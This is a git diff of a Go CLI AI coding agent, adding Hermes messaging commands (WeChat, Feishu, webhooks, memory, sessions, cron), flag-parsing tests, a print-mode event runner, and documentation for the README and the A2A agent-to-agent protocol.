+			credPath := cfg.GetWechatCredPath()
+			creds, err := wechat.LoadCredentials(credPath)
+			if err != nil || creds == nil {
+				fmt.Fprintln(os.Stderr, "WeChat: not logged in")
+				fmt.Fprintf(os.Stderr, "  Run: vibecoding hermes wechat login\n")
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "WeChat: logged in\n")
+			fmt.Fprintf(os.Stderr, "  UserID: %s\n", creds.UserID)
+			fmt.Fprintf(os.Stderr, "  AccountID: %s\n", creds.AccountID)
+			fmt.Fprintf(os.Stderr, "  SavedAt: %s\n", creds.SavedAt)
+			fmt.Fprintf(os.Stderr, "  CredPath: %s\n", credPath)
+			return nil
+		},
+	}
+
+	wechatCmd.AddCommand(wechatLoginCmd, wechatStatusCmd)
+
+	// --- feishu ---
+
+	feishuCmd := &cobra.Command{
+		Use:   "feishu",
+		Short: "Manage Feishu (Lark) connection",
+	}
+
+	feishuSetupCmd := &cobra.Command{
+		Use:   "setup",
+		Short: "Configure Feishu app credentials",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			fmt.Fprintln(os.Stderr, "Configure Feishu app credentials in hermes.json:")
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, `  "feishu": {`)
+			fmt.Fprintln(os.Stderr, `    "enabled": true,`)
+			fmt.Fprintln(os.Stderr, `    "app_id": "cli_xxxx",`)
+			fmt.Fprintln(os.Stderr, `    "app_secret": "xxxx"`)
+			fmt.Fprintln(os.Stderr, `  }`)
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, "Or set environment variables: FEISHU_APP_ID, FEISHU_APP_SECRET")
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, "Steps:")
+			fmt.Fprintln(os.Stderr, "  1. Go to https://open.feishu.cn → Create App")
+			fmt.Fprintln(os.Stderr, "  2. Enable Bot capability")
+			fmt.Fprintln(os.Stderr, "  3. Subscribe to im.message.receive_v1 event")
+			fmt.Fprintln(os.Stderr, "  4. Copy App ID and App Secret to hermes.json")
+			return nil
+		},
+	}
+
+	feishuStatusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show Feishu connection status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			if !cfg.Feishu.Enabled {
+				fmt.Fprintln(os.Stderr, "Feishu: disabled")
+				return nil
+			}
+			if cfg.Feishu.AppID == "" || cfg.Feishu.AppSecret == "" {
+				fmt.Fprintln(os.Stderr, "Feishu: enabled but not configured")
+				fmt.Fprintln(os.Stderr, "  Run: vibecoding hermes feishu setup")
+				return nil
+			}
+			fmt.Fprintln(os.Stderr, "Feishu: configured")
+			fmt.Fprintf(os.Stderr, "  AppID: %s\n", cfg.Feishu.AppID)
+			fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetPlatformWorkDir("feishu"))
+			return nil
+		},
+	}
+
+	feishuCmd.AddCommand(feishuSetupCmd, feishuStatusCmd)
+
+	// --- cron ---
+
+	cronCmd := newCronCommand()
+
+	// --- assemble ---
+
+	hermesCmd.AddCommand(startCmd, stopCmd, statusCmd, configCmd, clientCmd, wechatCmd, feishuCmd, cronCmd)
+
+	// --- webhook ---
+
+	webhookCmd := &cobra.Command{
+		Use:   "webhook",
+		Short: "Manage webhook routes",
+	}
+
+	webhookListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List configured webhook routes",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			if !cfg.Webhooks.Enabled {
+				fmt.Println("Webhooks: disabled")
+				return nil
+			}
+			if len(cfg.Webhooks.Routes) == 0 {
+				fmt.Println("No webhook routes configured.")
+				return nil
+			}
+			fmt.Printf("Webhooks: enabled (secret: %v)\n", cfg.Webhooks.Secret != "")
+			for _, r := range cfg.Webhooks.Routes {
+				events := "*"
+				if len(r.Events) > 0 {
+					events = fmt.Sprintf("%v", r.Events)
+				}
+				delivery := r.Delivery
+				if r.DeliveryTarget != "" {
+					delivery = fmt.Sprintf("%s:%s", r.Delivery, r.DeliveryTarget)
+				}
+				fmt.Printf("  POST /webhook%s  events=%s  skill=%s  delivery=%s\n", r.Path, events, r.Skill, delivery)
+			}
+			return nil
+		},
+	}
+
+	webhookCmd.AddCommand(webhookListCmd)
+
+	// --- memory ---
+
+	memoryCmd := &cobra.Command{
+		Use:   "memory",
+		Short: "Manage persistent memory",
+	}
+
+	memoryShowCmd := &cobra.Command{
+		Use:   "show",
+		Short: "Show current memory.md content",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			cfg.GetWorkDir() // ensure work dir resolved
+			store := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+			content, path, source, err := store.Read()
+			if err != nil {
+				return err
+			}
+			if content == "" {
+				fmt.Println("No memory file found.")
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "Source: %s — %s\n\n", source, path)
+			fmt.Println(content)
+			return nil
+		},
+	}
+
+	memoryClearCmd := &cobra.Command{
+		Use:   "clear",
+		Short: "Clear memory.md content",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			store := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+			if err := store.WriteAll("# Agent Memory\n\n## User Profile\n\n## Working Memory\n\n## Lessons Learned\n"); err != nil {
+				return err
+			}
+			fmt.Println("Memory cleared.")
+			return nil
+		},
+	}
+
+	memoryCmd.AddCommand(memoryShowCmd, memoryClearCmd)
+
+	// --- sessions ---
+
+	sessionsCmd := &cobra.Command{
+		Use:   "sessions",
+		Short: "Manage hermes sessions",
+	}
+
+	sessionsListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List active sessions (queries running instance)",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			url := fmt.Sprintf("http://%s/api/sessions", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			resp, err := client.Get(url)
+			if err != nil {
+				return fmt.Errorf("cannot reach hermes: %w (is it running?)", err)
+			}
+			defer resp.Body.Close()
+			var result map[string]any
+			json.NewDecoder(resp.Body).Decode(&result)
+			data, _ := json.MarshalIndent(result, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	sessionsCmd.AddCommand(sessionsListCmd)
+
+	hermesCmd.AddCommand(webhookCmd, memoryCmd, sessionsCmd)
+
+	return hermesCmd
+}
+
+// newCronCommand builds the "cron" subcommand tree.
+func newCronCommand() *cobra.Command {
+	var (
+		flagSchedule  string
+		flagOneShot   bool
+		flagA2ATarget string
+		flagA2AToken  string
+	)
+
+	cronCmd := &cobra.Command{
+		Use:   "cron",
+		Short: "Manage cron scheduled tasks",
+	}
+
+	cronListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List all cron jobs",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			jobs, err := store.List()
+			if err != nil {
+				return err
+			}
+			if len(jobs) == 0 {
+				fmt.Println("No cron jobs.")
+				return nil
+			}
+			for _, j := range jobs {
+				enabled := "✅"
+				if !j.Enabled {
+					enabled = "⏸"
+				}
+				kind := "periodic"
+				if j.OneShot {
+					kind = "one-shot"
+				}
+				fmt.Printf("%s [%s] %s (%s, %s, runs: %d)\n", enabled, j.ID, j.Name, kind, j.Schedule, j.RunCount)
+			}
+			return nil
+		},
+	}
+
+	cronAddCmd := &cobra.Command{
+		Use:   "add <name> <prompt>",
+		Short: "Add a cron job",
+		Args:  cobra.MinimumNArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			name := args[0]
+			prompt := args[1]
+			job, err := store.Create(cron.CronJob{
+				Name:      name,
+				Prompt:    prompt,
+				Schedule:  flagSchedule,
+				OneShot:   flagOneShot,
+				Enabled:   true,
+				Mode:      "yolo",
+				A2ATarget: flagA2ATarget,
+				A2AToken:  flagA2AToken,
+			})
+			if err != nil {
+				return err
+			}
+			fmt.Printf("✅ Created: [%s] %s\n", job.ID, job.Name)
+			if job.A2ATarget != "" {
+				fmt.Printf("   A2A Target: %s\n", job.A2ATarget)
+			}
+			return nil
+		},
+	}
+	cronAddCmd.Flags().StringVar(&flagSchedule, "schedule", "", "Schedule: @daily, @weekly, @every 30m, etc.")
+	cronAddCmd.Flags().BoolVar(&flagOneShot, "oneshot", false, "One-shot task (auto-disable after first run)")
+	cronAddCmd.Flags().StringVar(&flagA2ATarget, "a2a-target", "", "A2A server URL (send task via A2A protocol)")
+	cronAddCmd.Flags().StringVar(&flagA2AToken, "a2a-token", "", "Bearer token for A2A server")
+
+	cronRemoveCmd := &cobra.Command{
+		Use:   "remove <id>",
+		Short: "Remove a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			if err := store.Delete(args[0]); err != nil {
+				return err
+			}
+			fmt.Printf("🗑 Removed: %s\n", args[0])
+			return nil
+		},
+	}
+
+	cronEnableCmd := &cobra.Command{
+		Use:   "enable <id>",
+		Short: "Enable a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return setCronEnabled(args[0], true)
+		},
+	}
+
+	cronDisableCmd := &cobra.Command{
+		Use:   "disable <id>",
+		Short: "Disable a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return setCronEnabled(args[0], false)
+		},
+	}
+
+	cronCmd.AddCommand(cronListCmd, cronAddCmd, cronRemoveCmd, cronEnableCmd, cronDisableCmd)
+	return cronCmd
+}
diff --git a/cmd/vibecoding/main_test.go b/cmd/vibecoding/main_test.go
index d2fc8f1..57881e8 100644
--- a/cmd/vibecoding/main_test.go
+++ b/cmd/vibecoding/main_test.go
@@ -35,6 +35,98 @@ func TestRootPrintAcceptsMessageArgument(t *testing.T) {
 	}
 }
 
+func TestRootParsesSessionFlags(t *testing.T) {
+	var got runOptions
+
+	cmd := newRootCommand(
+		func(args []string, opts runOptions) error {
+			got = opts
+			return nil
+		},
+		func(acp.RunOptions) error {
+			t.Fatal("unexpected ACP command execution")
+			return nil
+		},
+	)
+	cmd.SetArgs([]string{
+		"--provider", "openai",
+		"--model", "gpt-test",
+		"--mode", "plan",
+		"--thinking", "high",
+		"--continue",
+		"--resume", "abc123",
+		"--session", "def456",
+		"--sandbox",
+		"--web-search",
+	})
+
+	if err := cmd.Execute(); err != nil {
+		t.Fatalf("execute command: %v", err)
+	}
+	if got.provider != "openai" {
+		t.Fatalf("provider = %q, want openai", got.provider)
+	}
+	if got.model != "gpt-test" {
+		t.Fatalf("model = %q, want gpt-test", got.model)
+	}
+	if got.mode != "plan" {
+		t.Fatalf("mode = %q, want plan", got.mode)
+	}
+	if got.thinking != "high" {
+		t.Fatalf("thinking = %q, want high", got.thinking)
+	}
+	if !got.continue_ {
+		t.Fatal("expected continue flag")
+	}
+	if got.resume != "abc123" {
+		t.Fatalf("resume = %q, want abc123", got.resume)
+	}
+	if got.session != "def456" {
+		t.Fatalf("session = %q, want def456", got.session)
+	}
+	if !got.sandbox {
+		t.Fatal("expected sandbox flag")
+	}
+	if !got.webSearch {
+		t.Fatal("expected web-search flag")
+	}
+}
+
+func TestACPParsesSharedFlagsWithoutRootFlags(t *testing.T) {
+	var got acp.RunOptions
+
+	cmd := newRootCommand(
+		func([]string, runOptions) error {
+			t.Fatal("unexpected root command execution")
+			return nil
+		},
+		func(opts acp.RunOptions) error {
+			got = opts
+			return nil
+		},
+	)
+	cmd.SetArgs([]string{"acp", "-p", "anthropic", "-m", "claude-test", "-M", "yolo", "-t", "medium", "--sandbox", "--verbose", "--debug"})
+
+	if err := cmd.Execute(); err != nil {
+		t.Fatalf("execute command: %v", err)
+	}
+	if got.Provider != "anthropic" {
+		t.Fatalf("Provider = %q, want anthropic", got.Provider)
+	}
+	if got.Model != "claude-test" {
+		t.Fatalf("Model = %q, want claude-test", got.Model)
+	}
+	if got.Mode != "yolo" {
+		t.Fatalf("Mode = %q, want yolo", got.Mode)
+	}
+	if got.Thinking != "medium" {
+		t.Fatalf("Thinking = %q, want medium", got.Thinking)
+	}
+	if !got.Sandbox || !got.Verbose || !got.Debug {
+		t.Fatalf("flags = sandbox:%v verbose:%v debug:%v, want all true", got.Sandbox, got.Verbose, got.Debug)
+	}
+}
+
 func TestRootStillDispatchesACPSubcommand(t *testing.T) {
 	var calledACP bool
 
diff --git a/cmd/vibecoding/main_util.go b/cmd/vibecoding/main_util.go
new file mode 100644
index 0000000..27a7687
--- /dev/null
+++ b/cmd/vibecoding/main_util.go
@@ -0,0 +1,308 @@
+package main
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"time"
+
+	"golang.org/x/term"
+
+	"github.com/charmbracelet/glamour"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+var debugEnabled bool
+
+// clearStdin reads and discards any pending input from stdin.
+// This is needed because some terminals send color query sequences on startup.
+func clearStdin() {
+	// Set a short read deadline so pending reads time out cleanly.
+	// Some stdin types (pipes, certain PTYs) don't support deadlines;
+	// if SetReadDeadline fails we skip clearing to avoid blocking forever.
+	if err := os.Stdin.SetReadDeadline(time.Now().Add(50 * time.Millisecond)); err != nil {
+		return
+	}
+	defer os.Stdin.SetReadDeadline(time.Time{}) // Clear deadline
+	buf := make([]byte, 128)
+	for {
+		n, err := os.Stdin.Read(buf)
+		if n == 0 || err != nil {
+			return
+		}
+	}
+}
+
+// debugLog prints debug messages to stderr if debug mode is enabled.
+func debugLog(format string, args ...interface{}) {
+	if debugEnabled {
+		fmt.Fprintf(os.Stderr, "[DEBUG] "+format+"\n", args...)
+	}
+}
+
+// createProvider creates a provider from config based on provider name.
+func createProvider(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
+	return providerfactory.Create(settings, providerName, modelID)
+}
+
+func runPrint(args []string, p provider.Provider, model *provider.Model, mode string, thinkingLevel provider.ThinkingLevel, settings *config.Settings, registry *tools.Registry, sess *session.Manager, extraContext string, multiAgent bool, agentMgr *agent.AgentManager) error {
+	input := strings.Join(args, " ")
+	if input == "" {
+		data, err := io.ReadAll(os.Stdin)
+		if err != nil {
+			return fmt.Errorf("no input provided")
+		}
+		input = string(data)
+	}
+
+	fmt.Fprintf(os.Stderr, "Using %s/%s in %s mode\n", p.Name(), model.ID, mode)
+
+	// Create glamour renderer for markdown
+	wordWrap := 80
+	if w, _, err := term.GetSize(int(os.Stdout.Fd())); err == nil && w > 0 {
+		wordWrap = w
+	}
+	renderer, err := glamour.NewTermRenderer(
+		glamour.WithStandardStyle("dark"),
+		glamour.WithWordWrap(wordWrap),
+	)
+	if err != nil {
+		debugLog("Failed to create glamour renderer: %v", err)
+		renderer = nil
+	}
+
+	compactionSettings := ctxpkg.CompactionSettings{
+		Enabled:          settings.Compaction.Enabled,
+		ReserveTokens:    settings.Compaction.ReserveTokens,
+		KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+	}
+	if compactionSettings.ReserveTokens == 0 {
+		compactionSettings.ReserveTokens = 16384
+	}
+	if compactionSettings.KeepRecentTokens == 0 {
+		compactionSettings.KeepRecentTokens = 20000
+	}
+
+	agentCfg := agent.Config{
+		Provider:           p,
+		Model:              model,
+		Mode:               mode,
+		ThinkingLevel:      thinkingLevel,
+		MaxTokens:          settings.MaxOutputTokens,
+		Settings:           settings,
+		Session:            sess,
+		ExtraContext:       extraContext,
+		CompactionSettings: compactionSettings,
+		MultiAgent:         multiAgent,
+	}
+
+	a := agent.New(agentCfg, registry)
+	if multiAgent && agentMgr != nil {
+		agentMgr.Register(agent.NewAgentAdapter(a))
+	}
+
+	ctx := context.Background()
+	eventCh := a.Run(ctx, input)
+
+	var textBuffer strings.Builder
+	var runErr error
+
+	err = agent.ConsumeEvents(ctx, eventCh, agent.EventHandlerFunc(func(_ context.Context, event agent.Event) error {
+		switch event.Type {
+		case agent.EventToolApprovalRequest:
+			return fmt.Errorf("tool approval required in print mode for %s; rerun interactively, use --mode yolo, or whitelist the command", event.ApprovalTool)
+		case agent.EventTextDelta:
+			textBuffer.WriteString(event.TextDelta)
+		case agent.EventToolCall:
+			// Flush text buffer before tool call
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			fmt.Fprintf(os.Stderr, "\n[tool: %s]\n", event.ToolCall.Name)
+		case agent.EventToolExecutionStart:
+			fmt.Fprintf(os.Stderr, "[running: %s] ", event.ToolName)
+		case agent.EventToolExecutionEnd:
+			if event.ToolError != nil {
+				fmt.Fprintf(os.Stderr, "error: %v\n", event.ToolError)
+			} else {
+				fmt.Fprintf(os.Stderr, "done\n")
+			}
+		case agent.EventToolResult:
+			// Show full tool result for bash commands
+			if event.ToolName == "bash" {
+				fmt.Fprintf(os.Stderr, "\n%s\n", event.ToolResult)
+			} else if event.ToolDiff != nil {
+				fmt.Fprintf(os.Stderr, "\n[change: %s] +%d -%d (-%s +%s)\n",
+					event.ToolDiff.Path,
+					event.ToolDiff.Added,
+					event.ToolDiff.Deleted,
+					formatLineRanges(event.ToolDiff.DeletedLines),
+					formatLineRanges(event.ToolDiff.AddedLines),
+				)
+			}
+		case agent.EventPlanUpdate:
+			if event.Plan != nil {
+				fmt.Fprintf(os.Stderr, "\n%s\n", formatTaskPlan(event.Plan))
+			}
+		case agent.EventDone:
+			// Flush remaining text buffer
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			// Show context usage
+			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
+				fmt.Fprintf(os.Stderr, "\nContext: %.1f%%/%s\n",
+					*event.ContextUsage.Percent,
+					formatTokenCount(event.ContextUsage.ContextWindow))
+			}
+		case agent.EventError:
+			runErr = event.Error
+			// Flush text buffer before error
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			if event.Error != nil {
+				return event.Error
+			}
+		case agent.EventUsage:
+			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
+				fmt.Fprintf(os.Stderr, "Context: %.1f%%/%s | ",
+					*event.ContextUsage.Percent,
+					formatTokenCount(event.ContextUsage.ContextWindow))
+			}
+			if event.Usage != nil {
+				cacheInfo := ""
+				if info := event.Usage.CacheInfo(); info != "" {
+					cacheInfo = " | " + info
+				}
+				fmt.Fprintf(os.Stderr, "Tokens: %d↓/%d↑ $%.4f%s\n",
+					event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
+			}
+		case agent.EventCompactionStart:
+			fmt.Fprintf(os.Stderr, "\n⏳ Compacting context...\n")
+		case agent.EventCompactionEnd:
+			if event.Error != nil {
+				fmt.Fprintf(os.Stderr, "Compaction failed: %v\n", event.Error)
+			} else if event.StatusMessage != "" {
+				fmt.Fprintf(os.Stderr, "✅ %s\n", event.StatusMessage)
+			} else {
+				fmt.Fprintf(os.Stderr, "✅ Context compacted\n")
+			}
+		}
+		return nil
+	}))
+	if multiAgent && agentMgr != nil {
+		finishErr := runErr
+		if finishErr == nil {
+			finishErr = err
+		}
+		agentMgr.Finish(a.ID(), finishErr)
+	}
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func formatTaskPlan(plan *tools.TaskPlan) string {
+	if plan == nil || len(plan.Steps) == 0 {
+		return "Plan updated."
+	}
+	var sb strings.Builder
+	title := plan.Title
+	if title == "" {
+		title = "Plan"
+	}
+	sb.WriteString(title)
+	for _, step := range plan.Steps {
+		sb.WriteString("\n")
+		sb.WriteString(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title))
+	}
+	if plan.Note != "" {
+		sb.WriteString("\nnote: " + plan.Note)
+	}
+	return sb.String()
+}
+
+func planStatusMarker(status string) string {
+	switch status {
+	case "running":
+		return ">"
+	case "done":
+		return "x"
+	case "failed":
+		return "!"
+	default:
+		return "-"
+	}
+}
+
+func formatLineRanges(lines []int) string {
+	if len(lines) == 0 {
+		return "none"
+	}
+	var ranges []string
+	start, prev := lines[0], lines[0]
+	for _, line := range lines[1:] {
+		if line == prev+1 {
+			prev = line
+			continue
+		}
+		ranges = append(ranges, formatLineRange(start, prev))
+		start, prev = line, line
+	}
+	ranges = append(ranges, formatLineRange(start, prev))
+	return strings.Join(ranges, ",")
+}
+
+func formatLineRange(start, end int) string {
+	if start == end {
+		return fmt.Sprintf("%d", start)
+	}
+	return fmt.Sprintf("%d-%d", start, end)
+}
+
+// flushTextBuffer renders and prints the accumulated text buffer.
+func flushTextBuffer(buffer *strings.Builder, renderer *glamour.TermRenderer) {
+	text := buffer.String()
+	buffer.Reset()
+
+	if renderer != nil {
+		rendered, err := renderer.Render(text)
+		if err != nil {
+			// Fallback to plain text
+			fmt.Print(text)
+		} else {
+			fmt.Print(rendered)
+		}
+	} else {
+		fmt.Print(text)
+	}
+}
+
+// formatTokenCount formats a token count for display.
+func formatTokenCount(count int) string {
+	if count < 1000 {
+		return fmt.Sprintf("%d", count)
+	}
+	if count < 10000 {
+		return fmt.Sprintf("%.1fk", float64(count)/1000)
+	}
+	if count < 1000000 {
+		return fmt.Sprintf("%dk", count/1000)
+	}
+	if count < 10000000 {
+		return fmt.Sprintf("%.1fM", float64(count)/1000000)
+	}
+	return fmt.Sprintf("%dM", count/1000000)
+}
diff --git a/cmd/vibecoding/print_mode_test.go b/cmd/vibecoding/print_mode_test.go
index d2e9274..74f7e76 100644
--- a/cmd/vibecoding/print_mode_test.go
+++ b/cmd/vibecoding/print_mode_test.go
@@ -32,6 +32,8 @@ func TestRunPrintFailsWhenApprovalWouldBeRequired(t *testing.T) {
 		registry,
 		(*session.Manager)(nil),
 		"",
+		false,
+		nil,
 	)
 	if err == nil {
 		t.Fatal("expected runPrint to fail when approval is required")
diff --git a/docs/en/README.md b/docs/en/README.md
index a6ee654..f7658af 100644
--- a/docs/en/README.md
+++ b/docs/en/README.md
@@ -9,9 +9,16 @@
 </p>
 
 <p align="center">
-  <a href="https://github.com/startvibecoding/vibecoding"><img src="https://img.shields.io/github/v/release/startvibecoding/vibecoding" alt="GitHub Release"></a>
-  <a href="https://github.com/startvibecoding/vibecoding/blob/main/LICENSE"><img src="https://img.shields.io/github/license/startvibecoding/vibecoding" alt="License"></a>
-  <a href="https://github.com/startvibecoding/vibecoding"><img src="https://img.shields.io/github/stars/startvibecoding/vibecoding?style=social" alt="GitHub Stars"></a>
+  Progressive and agile vibe-coding tool. No need to re-deploy Claude Code, Codex, Claw, or Hermes — everything is packed into a single file.
+</p>
+
+<p align="center">
+  <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
+  <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
+  <a href="https://goreportcard.com/report/github.com/startvibecoding/vibecoding"><img src="https://goreportcard.com/badge/github.com/startvibecoding/vibecoding" alt="Go Report Card"></a>
+  <a href="https://pkg.go.dev/github.com/startvibecoding/vibecoding"><img src="https://pkg.go.dev/badge/github.com/startvibecoding/vibecoding?status.svg" alt="GoDoc"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/network/dependencies"><img src="https://img.shields.io/librariesio/release/github/startvibecoding/vibecoding" alt="Dependencies"></a>
 </p>
 
 ---
@@ -20,8 +27,9 @@ Welcome to the VibeCoding Documentation Center!
 
 ## Features
 
-- Multi-provider AI coding assistant for DeepSeek, OpenAI, Anthropic, and compatible custom APIs
+- Multi-provider AI coding assistant for DeepSeek, OpenAI, Anthropic, and compatible custom APIs through vendor adapters
 - Rich terminal UI with sessions, context management, skills, and sandboxed tool execution
+- Optional `--multi-agent` mode with delegated sub-agents and cron command entry points
 - ACP support: run VibeCoding as an Agent Client Protocol stdio agent for editor integrations and compatible clients, including VS Code, Zed, and JetBrains IDEs such as IntelliJ IDEA/WebStorm via ACP-compatible plugins
 - Safer approval handling: `bashBlacklist` now overrides whitelist entries, including in YOLO mode, and `--print` exits early when approval would be required
 - Unified cache metrics across TUI and print mode for cache hit rate and token totals
@@ -40,7 +48,9 @@ Welcome to the VibeCoding Documentation Center!
 - [System Architecture](architecture.md) — Project structure, core components, data flow
 - [Tool System](tools.md) — Built-in tools usage guide
 - [Skills System](skills.md) — Reusable prompt snippets
+- [Online Skill Marketplace](skillhub.md) — Compatible with SkillHub / ClawHub, skill installation & cron foundation
 - [Session Management](sessions.md) — Session storage and management
+- [SDK Integration](sdk.md) — Embed VibeCoding agent in your Go applications
 
 ### Security
 - [Security & Sandbox](security.md) — Sandbox modes, permission control, approval mechanism
@@ -48,6 +58,14 @@ Welcome to the VibeCoding Documentation Center!
 ### IDE Integration
 - [ACP Protocol](acp.md) — Agent Client Protocol for VS Code and JetBrains
 
+### Gateway Modes
+- [Gateway Mode](gateway.md) — OpenAI-compatible HTTP gateway
+- [Hermes Mode](hermes.md) — Messaging gateway (WeChat/Feishu/WebSocket)
+- [A2A Protocol](a2a.md) — Agent-to-Agent protocol server and Master mode
+
+### Scenarios
+- [Scenarios & Walkthroughs](scenarios.md) — Practical usage examples for all modes
+
 ### Development
 - [Development Guide](development.md) — Contributing code, testing, building
 
@@ -61,11 +79,14 @@ Welcome to the VibeCoding Documentation Center!
 |-------|-------------|
 | [Quick Start](getting-started.md) | Get started with VibeCoding in 5 minutes |
 | [Configuration](configuration.md) | Customize providers, models, and behavior |
-| [Tool Reference](tools.md) | Learn about all 7 built-in tools |
+| [Tool Reference](tools.md) | Learn about built-in tools and optional multi-agent tools |
 | [Security Model](security.md) | Understand sandbox, modes, and permissions |
 | [ACP Protocol](acp.md) | IDE integration via Agent Client Protocol |
 | [Session Management](sessions.md) | Conversation history and branching |
 | [Skills System](skills.md) | Create reusable prompt snippets |
+| [Online Skill Marketplace](skillhub.md) | SkillHub / ClawHub integration and cron foundation |
+| [SDK Integration](sdk.md) | Embed VibeCoding agent in your Go applications |
+| [Scenarios & Walkthroughs](scenarios.md) | Practical usage examples for all modes |
 | [Changelog](changelog.md) | See what's new in each release |
 
 ## Supported LLMs
@@ -75,7 +96,8 @@ Welcome to the VibeCoding Documentation Center!
 | **DeepSeek** (default) | deepseek-v4-flash, deepseek-v4-pro | OpenAI Chat / Anthropic Messages |
 | **OpenAI** | GPT-4o, o1, etc. | OpenAI Chat |
 | **Anthropic** | Claude Sonnet, Opus, etc. | Anthropic Messages |
-| **Custom** | Any compatible model | OpenAI Chat or Anthropic Messages |
+| **Vendor adapters** | Google Gemini, Google Vertex, Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more | OpenAI Chat or Anthropic Messages |
+| **Custom** | Any compatible model | Generic OpenAI Chat or Anthropic Messages fallback |
 
 ## Quick Install
 
diff --git a/docs/en/a2a.md b/docs/en/a2a.md
new file mode 100644
index 0000000..7ea7f08
--- /dev/null
+++ b/docs/en/a2a.md
@@ -0,0 +1,372 @@
+# A2A Protocol (Agent-to-Agent)
+
+## Overview
+
+The A2A (Agent-to-Agent) protocol enables different AI agents to discover, communicate, and collaborate with each other. VibeCoding implements the A2A protocol as both a **standalone server** and an **integrated mode** within Hermes.
+
+## Quick Start
+
+```bash
+# Standalone mode
+vibecoding a2a start
+
+# Check status
+vibecoding a2a status
+
+# View Agent Card
+vibecoding a2a card
+
+# Send task to another A2A server
+vibecoding a2a send "list all Go files" --target http://remote:8093
+
+# Discover remote Agent Card
+vibecoding a2a discover http://remote:8093
+
+# Stop
+vibecoding a2a stop
+```
+
+## Running Modes
+
+### Standalone Mode
+
+Runs a dedicated A2A HTTP server on a separate port (default: `127.0.0.1:8093`).
+
+```bash
+vibecoding a2a start --port 8093 --work-dir /path/to/project
+```
+
+Use `--host 0.0.0.0` only when you intentionally want to expose the A2A server beyond loopback, and configure an auth token for exposed deployments.
+
+### Integration Mode
+
+A2A endpoints are mounted on the Hermes gateway when `a2a.enabled: true` in `hermes.json`.
+
+```jsonc
+{
+  "a2a": {
+    "enabled": true,
+    "port": 8093  // ignored in integration mode (uses hermes port)
+  }
+}
+```
+
+Endpoints are available at:
+- `http://localhost:8090/.well-known/agent.json`
+- `http://localhost:8090/a2a`
+- `http://localhost:8090/a2a/events`
+
+## Protocol Details
+
+- **Transport**: JSON-RPC 2.0 over HTTP
+- **Streaming**: SSE (Server-Sent Events) for real-time updates
+- **Task Lifecycle**: `submitted` → `working` → `completed`/`failed`/`canceled`
+
+## Agent Card
+
+The Agent Card describes the agent's capabilities and is served at `/.well-known/agent.json`.
+
+```json
+{
+  "name": "VibeCoding",
+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.31",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
